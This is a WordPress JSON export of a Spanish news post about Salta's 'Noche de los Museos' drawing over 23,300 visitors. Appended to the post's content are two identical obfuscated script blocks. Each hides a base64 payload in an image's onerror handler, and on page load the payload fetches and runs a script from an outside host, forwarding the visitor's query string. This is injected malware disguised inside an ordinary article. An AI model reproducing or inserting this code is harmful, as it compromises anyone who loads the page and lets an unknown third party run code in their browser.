{"id":3407,"date":"2023-12-11T09:54:43","date_gmt":"2023-12-11T12:54:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3407"},"modified":"2025-08-14T00:03:38","modified_gmt":"2025-08-14T03:03:38","slug":"noche-de-los-museos-mas-de-23-300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3407","title":{"rendered":"Noche de los Museos: M\u00e1s de 23.300 personas recorrieron museos y galer\u00edas de arte en toda la provincia"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#830831\"><em>En el marco del ciclo de fin de a\u00f1o Salta de Fiesta, 23.375 salte\u00f1os y turistas dijeron s\u00ed a la propuesta de La Noche de los Museos en toda la Provincia.<\/em><\/h3>\n\n\n\n<p>Se trat\u00f3 de una jornada de celebraci\u00f3n que incluy\u00f3, como novedad, a galer\u00edas de arte y proyectos art\u00edsticos de diferentes puntos de la provincia, alcanzando una convocatoria r\u00e9cord de espacios adheridos.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3408\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5541-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg\" alt=\"\" class=\"wp-image-3408\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5541-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5541-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5541-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5541-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5541-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3409\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5542-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg\" alt=\"\" class=\"wp-image-3409\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5542-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5542-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5542-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5542-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5542-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3410\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5543-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg\" alt=\"\" class=\"wp-image-3410\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5543-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5543-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5543-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5543-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5543-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>De este modo, y por iniciativa del Gobierno de la Provincia de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y la Subsecretar\u00eda de Patrimonio Cultural, m\u00e1s de 400 artistas participaron del evento, a trav\u00e9s de las 43 instituciones antes mencionadas que ofrecieron actividades destinadas a toda la familia.<\/p>\n\n\n\n<p>De 18 a 24 horas,&nbsp;p\u00fablico de todas las edades recorri\u00f3 las salas consultando la programaci\u00f3n en sus celulares, eligiendo propuestas y descubriendo la obra de artistas salte\u00f1os en exposici\u00f3n y venta en las diferentes galer\u00edas de arte.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10164-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/10164-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg\" alt=\"Noche de los Museos: M\u00e1s de 23.300 personas recorrieron museos y galer\u00edas de arte en toda la provincia.\"\/><\/a><\/figure>\n\n\n\n<p>El secretario de Cultura,&nbsp;<strong>Diego Ashur<\/strong>&nbsp;manifest\u00f3: \u00abLa Noche de los museos se ha convertido en uno de los eventos importantes que comprenden el calendario cultural de la provincia\u00bb, y agreg\u00f3 que \u00abes importante destacar el car\u00e1cter federal que hemos concretado con la participaci\u00f3n de m\u00e1s de 43 instituciones en toda la provincia, que son las encargadas de facilitar el acceso a la Cultura por parte de todos los salte\u00f1os\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3411\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5544-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg\" alt=\"\" class=\"wp-image-3411\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5544-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5544-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5544-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5544-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5544-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3412\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5545-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg\" alt=\"\" class=\"wp-image-3412\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5545-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5545-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5545-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5545-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/12\/5545-noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>A lo largo de los a\u00f1os, y gracias al trabajo y compromiso sostenidos en el \u00e1mbito del patrimonio cultural, tanto el D\u00eda Internacional de los Museos como La Noche de los Museos, se han instalado en la agenda anual de los salte\u00f1os y salte\u00f1as, integr\u00e1ndolos y poniendo a su alcance todos los espacios culturales.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvo presente recorriendo los museos junto al secretario de Cultura,&nbsp;<strong>Claudia Lamas,<\/strong>&nbsp;subsecretaria de Patrimonio Cultural.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"M\u00e1s de 23.300 personas recorrieron museos y galer\u00edas de arte en toda la provincia\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/o8ulU_95nUw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/noche-de-los-museos-mas-de-23300-personas-recorrieron-museos-y-galerias-de-arte-en-toda-la-provincia-93292\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del ciclo de fin de a\u00f1o Salta de Fiesta, 23.375 salte\u00f1os y turistas dijeron s\u00ed a la propuesta de La Noche de los Museos en toda la Provincia. Se trat\u00f3 de una jornada de celebraci\u00f3n que incluy\u00f3, como novedad, a galer\u00edas de arte y proyectos art\u00edsticos de diferentes puntos de la provincia, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3408,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-3407","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3407"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3407"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3407\/revisions"}],"predecessor-version":[{"id":6895,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3407\/revisions\/6895"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3408"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3407"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3407"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3407"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}